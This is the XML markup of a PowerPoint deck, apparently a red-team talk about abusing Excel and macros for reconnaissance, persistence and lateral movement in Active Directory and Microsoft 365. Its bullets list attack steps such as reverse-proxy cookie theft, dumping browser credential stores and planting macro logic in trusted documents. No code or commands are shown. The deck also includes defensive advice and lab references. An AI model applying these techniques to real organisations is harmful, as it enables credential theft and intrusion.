              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lateral movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider other ways these features might be abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Share them with the community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58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A7C-C70B-4438-E573-D31D187D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B611-246F-2DD5-41D7-142B35D7F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Defense:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use tooling to better understand environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Office nearly universally available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offensive tools may be prohibited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7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EB0-E1FE-B7CC-4E96-34AF5270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9EDF-6205-E2A1-C019-24FF9CF20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of Active Directory (GOAD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/Orange-Cyberdefense/GOAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://mayfly277.github.io/posts/GOADv2/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Badblood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/davidprowe/BadBlood</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="753005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60E6394-74C5-5761-1305-8BA40DB9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1000"/>
            <a:ext cx="9144000" cy="890068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45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0B57-DF1A-B9C7-D8D4-90E5779C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Tool of Choice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674DB-680D-0D0C-FFD8-866BC023D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  <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple tabular format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hide/unhide content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filtering and sorting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conditional formatting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2C9CF-144C-A9EA-F135-B1AD3682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69" y="1615640"/>
            <a:ext cx="2124371" cy="1371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B88F5-13E7-8C3A-AB03-BFA742718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420" y="2987431"/>
            <a:ext cx="2136120" cy="1034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9A862-5E87-CBE4-1D81-830270E3D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769" y="1615640"/>
            <a:ext cx="1353161" cy="2830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18752E-42BA-5957-84E5-58DE3F56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139" y="4201049"/>
            <a:ext cx="2435461" cy="2082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56882-A7D2-CED3-229B-5B2703264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427" y="4582181"/>
            <a:ext cx="2352504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5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974-B718-0913-3012-F0332734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38FA3-E1B8-BC35-1307-772D8299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9" y="1253331"/>
            <a:ext cx="6400809" cy="4661694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted Microsoft application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Macros often enabled and used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test detection of uncommon tooling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy visualization of results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bloodhound temporal data less reliable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Export from graph to get 2D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visuals for reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to customize</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Customer resource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FEBD8-2319-1C34-DD0C-EBAC1CE2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8" y="1253331"/>
            <a:ext cx="4646897" cy="2759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96246-0730-7CC0-1660-EA2C53F83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8" y="4199268"/>
            <a:ext cx="4646897" cy="2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12BBF3-769B-E56F-A10D-DC3AF1FD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93" y="3544345"/>
            <a:ext cx="1843399" cy="163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8DD5D-7E3E-F952-9F23-8C4839B7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55751-3ABD-B188-6B54-F3A025209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information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Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File system manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>External data collection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SharePoint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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CF8C5-C678-3B73-314C-C2474ECE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455" y="1390071"/>
            <a:ext cx="2733602" cy="1073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F505A-FE56-4B51-0F23-7005F1D8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455" y="2600726"/>
            <a:ext cx="2312734" cy="1972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41F13-58CC-F52A-84F4-58B51961B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923" y="1253331"/>
            <a:ext cx="2691385" cy="1631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C7707-E331-5775-37E0-32F940FBF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801" y="2600726"/>
            <a:ext cx="1895135" cy="1372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F626B0-3439-F481-6816-9D095CEE6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1206" y="4477487"/>
            <a:ext cx="1550496" cy="17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3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CEAF-39DB-BC16-5CE4-5B8A70EE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9981E-A81B-8E03-E2CA-7B54EC643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365 Feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SharePoint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OneDrive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Shares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Last modification date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watch who is using a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39CD0-B8B3-4F11-4FC7-F7838773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445" y="1812624"/>
            <a:ext cx="2391109" cy="3724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95153-8809-186E-B80D-676063F4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91" y="1812626"/>
            <a:ext cx="2762636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DE29B-2C22-300E-0D7B-2BA31D3F1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091" y="1200584"/>
            <a:ext cx="4972744" cy="447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5449-1607-C8F4-882D-105EF8C8A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200" y="3521162"/>
            <a:ext cx="2475568" cy="2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3A64-324F-2EF7-2D2C-3B3FE896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2F1D9-DBBD-691F-362E-2F823CB7D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Assumed Breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Model malicious insider</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Red Team Exercises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Post-compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft 365-only Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Special testing scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vendor emulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Partner emulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often goes undetected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EA2EB-B3CE-C57D-F864-8E03E206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287" y="1253331"/>
            <a:ext cx="3324659" cy="50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4B1E-E321-3634-2DE8-AFF9E89B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66C1-275F-48F6-6F76-82DE921D3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gains access to M365</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse proxy cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phish &gt; Dump browser store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealer log credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search for documents to poison</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drop macro logic into trusted documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Direct persistence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4A09F-C068-B6D4-50EB-765E8F4A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02" y="1262426"/>
            <a:ext cx="1154073" cy="9448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CFEB3-AA98-28AD-2D15-A7B62548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410" y="1253331"/>
            <a:ext cx="1904444" cy="9539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C3A00-8672-2893-8B5E-4D746CF9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544" y="1262426"/>
            <a:ext cx="1282917" cy="101034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772D77-E524-7C85-0438-8A097FD37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201" y="2601375"/>
            <a:ext cx="1015375" cy="9157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E48D6B-433D-0FB5-54EA-80E1F8B8C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712" y="3909413"/>
            <a:ext cx="953496" cy="9157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196870-828E-25EB-1378-B2020A4CB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216" y="5483769"/>
            <a:ext cx="1070828" cy="108269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02213F-AD0A-CCB7-9726-90B9006865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9018" y="5524550"/>
            <a:ext cx="1214361" cy="1024836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84FF3-3FFF-C1F7-F54C-4714A7A069D7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>
            <a:off x="7652539" y="2207281"/>
            <a:ext cx="1014662" cy="8519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332C-281A-528B-DBFB-ED934AE8C36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74889" y="2272769"/>
            <a:ext cx="2114" cy="32860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BCBD75-B98D-89B2-2F75-CC401BA2C2AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9682576" y="2207281"/>
            <a:ext cx="1350056" cy="8519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E99190-7096-E2AD-3D98-B9A14F2A688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9174889" y="3517110"/>
            <a:ext cx="4571" cy="3923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D010B-408F-963E-210E-5E68422820B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8502630" y="4825147"/>
            <a:ext cx="676830" cy="6586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735A9E-611F-E1E8-CA9C-991D33C1A4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9179460" y="4825147"/>
            <a:ext cx="900950" cy="6994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4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Widescreen</PresentationFormat>
  <Paragraphs>209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Office Theme</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Objectives</vt:lpstr>
      <vt:lpstr>History</vt:lpstr>
      <vt:lpstr>Primary Tool of Choice</vt:lpstr>
      <vt:lpstr>Benefits</vt:lpstr>
      <vt:lpstr>Useful Capabilities</vt:lpstr>
      <vt:lpstr>Presence</vt:lpstr>
      <vt:lpstr>Commonly used on</vt:lpstr>
      <vt:lpstr>Attack scenario</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Local Reconnaissance</vt:lpstr>
      <vt:lpstr>Active Directory Reconnaissance</vt:lpstr>
      <vt:lpstr>Active Directory Reconnaissance</vt:lpstr>
      <vt:lpstr>Active Directory Reconnaissance</vt:lpstr>
      <vt:lpstr>Active Directory Reconnaissance</vt:lpstr>
      <vt:lpstr>Active Directory Reconnaissance</vt:lpstr>
      <vt:lpstr>Group Policy Analysis</vt:lpstr>
      <vt:lpstr>Microsoft SQL Server Access</vt:lpstr>
      <vt:lpstr>Microsoft Excel DB Exploration</vt:lpstr>
      <vt:lpstr>Microsoft Excel DB Exploration</vt:lpstr>
      <vt:lpstr>Microsoft Excel DB Exploration</vt:lpstr>
      <vt:lpstr>Microsoft Excel DB Exploration</vt:lpstr>
      <vt:lpstr>Microsoft Excel DB Exploration</vt:lpstr>
      <vt:lpstr>Remote Collection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SSH Abuse</vt:lpstr>
      <vt:lpstr>Restricted User Creation</vt:lpstr>
      <vt:lpstr>Macro SSH Abuse</vt:lpstr>
      <vt:lpstr>Example LNK Commands</vt:lpstr>
      <vt:lpstr>Post-Compromise Lateral Movement</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary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2024-04-17T21:19:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-17T21:20:04Z</dcterms:modified>
</cp:coreProperties>
</file>